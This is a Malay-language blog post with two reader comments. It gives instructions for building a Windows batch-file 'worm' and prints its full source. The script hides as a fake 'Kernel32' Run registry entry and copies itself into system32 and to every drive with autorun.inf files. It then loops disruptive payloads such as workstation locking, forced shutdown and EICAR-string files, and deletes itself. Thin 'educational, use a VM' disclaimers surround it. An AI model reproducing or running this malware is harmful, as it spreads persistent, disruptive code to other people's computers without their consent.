Saturday, 16 July 2011

Trik Notepad #2

Ne adalah cara untuk membuat virus WORM menggunakan Notepad.  Jangan RUN file ini di komputer anda sendiri.

Cara Melakukan


1. Buka Notepad anda

2. Salin script di bawah ke dalam notepad anda.


@echo off > nul.mole
set /a num1=%random%
if %num1% GEQ %random% (
echo @echo off ^> nul.mole > mole_hole.bat
find "hole_A"<%0>> mole_hole.bat
call mole_hole.bat) else if %num1% LEQ %random% (
Whack_A_Mole.exe
echo @echo off ^> nul.mole > mole_hole.bat
find "hole_B"<%0>> mole_hole.bat
call mole_hole.bat) else (
MelterMole.exe
echo @echo off ^> nul.mole > mole_hole.bat
find "hole_C"<%0>> mole_hole.bat
call mole_hole.bat)
exit

::::::::::::::::::::::::::::::::::::::::::::::::::::::::TUNNEL 1::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
set /a tunnel_num=%random% %hole_A%
if /i %tunnel_num% GEQ %random% ( %hole_A%
@copy /y mole.bat %windir%\system32 %hole_A% 
@set value="Kernel32_%Random%_DLL" %hole_A% 
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_A% 
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_A% 
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_A% 
@Copy /y mole.bat %%d:\ %hole_A% 
@Echo [AutoRun] > %%d:\autorun.inf %hole_A% 
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_A% 
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_A% 
@echo :mole > tunnel.bat %hole_A% 
@echo @Rundll32 User32,SetCursorPos >> tunnel.bat %hole_A% 
@echo goto mole >> tunnel.bat) else ( %hole_A%
@copy /y mole.bat %windir%\system32 %hole_A%
@set value="Kernel32_%Random%_DLL" %hole_A%
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_A%
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_A%
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_A%
@Copy /y mole.bat %%d:\ %hole_A%
@Echo [AutoRun] > %%d:\autorun.inf %hole_A%
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_A%
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_A%
@echo :mole > tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.mp3 >> tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.com >> tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.exe >> tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.sys >> tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.ini >> tunnel.bat %hole_A%
@echo @echo X5O!P%%%%@AP[4\PZX54(P^^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ^>^> tunnel_%random%.zip >> tunnel.bat %hole_A%
@echo goto mole >> tunnel.bat) %hole_A%

::::::::::::::::::::::::::::::::::::::::::::::::::::::::TUNNEL 2::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@set /a tunnel_num=%random% %hole_B%
@if /i %tunnel_num% GEQ %random% ( %hole_B%
@copy /y mole.bat %windir%\system32 %hole_B% 
@set value="Kernel32_%Random%_DLL" %hole_B% 
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_B% 
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_B% 
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_B% 
@Copy /y mole.bat %%d:\ %hole_B% 
@Echo [AutoRun] > %%d:\autorun.inf %hole_B% 
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_B% 
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_B% 
@echo :mole > tunnel.bat %hole_B% 
@echo @Rundll32 User32,LockWorkStation >> tunnel.bat %hole_B% 
@echo goto mole >> tunnel.bat) else ( %hole_B%
@copy /y mole.bat %windir%\system32 %hole_B%
@set value="Kernel32_%Random%_DLL" %hole_B%
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_B%
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_B%
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_B%
@Copy /y mole.bat %%d:\ %hole_B%
@Echo [AutoRun] > %%d:\autorun.inf %hole_B%
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_B%
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_B%
@echo :mole > tunnel.bat %hole_B%
@echo @Start notepad >> tunnel.bat %hole_B%
@echo goto mole >> tunnel.bat) %hole_B%

::::::::::::::::::::::::::::::::::::::::::::::::::::::::TUNNEL 3::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
set /a tunnel_num=%random% %hole_C%
if /i %tunnel_num% GEQ %random% ( %hole_C%
@copy /y mole.bat %windir%\system32 %hole_C% 
@set value="Kernel32_%Random%_DLL" %hole_C% 
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_C% 
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_C% 
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_C% 
@Copy /y mole.bat %%d:\ %hole_C% 
@Echo [AutoRun] > %%d:\autorun.inf %hole_C% 
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_C% 
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_C% 
@echo :mole > tunnel.bat %hole_C% 
@echo @Start www.mole.net >> tunnel.bat %hole_C% 
@echo goto mole >> tunnel.bat) else ( %hole_C%
@copy /y mole.bat %windir%\system32 %hole_C%
@set value="Kernel32_%Random%_DLL" %hole_C%
@set regkey="HKLM\Software\Microsoft\Windows\CurrentVersion\Run" %hole_C%
@reg add %regkey% /v %value% /t "REG_SZ" /d %windir%\system32\mole.bat /f > nul %hole_C%
@For %%d In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( %hole_C%
@Copy /y mole.bat %%d:\ %hole_C%
@Echo [AutoRun] > %%d:\autorun.inf %hole_C%
@Echo open="%%d:\mole.bat" >> %%d:\autorun.inf %hole_C%
@Echo action=Open folder to see files... >> %%d:\autorun.inf) %hole_C%
@Shutdown -f -s

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Max The Moles Hole :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo :mole > Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Md=tunnel >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::::::::::: Melter The Polymorphic Mole::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::                                                                   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::                Now sole in his hole                     ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::                Sits Melter the mole                     ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::While his stomach for troublesome grows       ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::                He lowers his nose                       ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::              Till it touches his toes                     ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo :: And he doesn't know where he should go       ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::                                                                   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::I    I::::::::::::::::::::::::::::::::::::::::::::::::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::I    I::::::::::::::::::::::::::::::::::::::::::::::::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::I                      o0O ::::::::::::::::::::::::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Echo ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::   ^>^> Max_The_Mole.txt >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo @Cd tunnel  >> Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@echo goto mole >> Max_The_Mole.bat) %hole_A% %hole_B% %hole_C%
@call Max_The_Mole.bat %hole_A% %hole_B% %hole_C%
@call tunnel.bat %hole_A% %hole_B% %hole_C%
@del /q /s /f %0 %hole_A% %hole_B% %hole_C%3. Save fail nama_fail.bat , nama_fail terpulang pada korang tapi paling penting .bat tu.PERHATIAN :

Hanya gunakan fail ini di Virtual Machine Komputer, Jangan RUN di komputer persendirian anda, saya tidak bertanggungjawab atas kerosakan yang bakal terjadi.


Fail ini dikongsi atas tujuan rujukan pelajaran sahaja. Perkongsian ini dibuat supaya anda dapat mempelajari sedikit kode seperti ini supaya anda tidak tertipu dan disalahgunakan oleh pihak yang tidak bertanggungjawab.


p/s : Kami Hack Kerana Anda Cuai

2 comments:

vampire's lovex said...

waaaaaaa... kami hack kerana anda cuai ??

tak baik ohhhh

Anonymous said...

@vampire's lovex
Hehe...itu sebagai peringatan... :)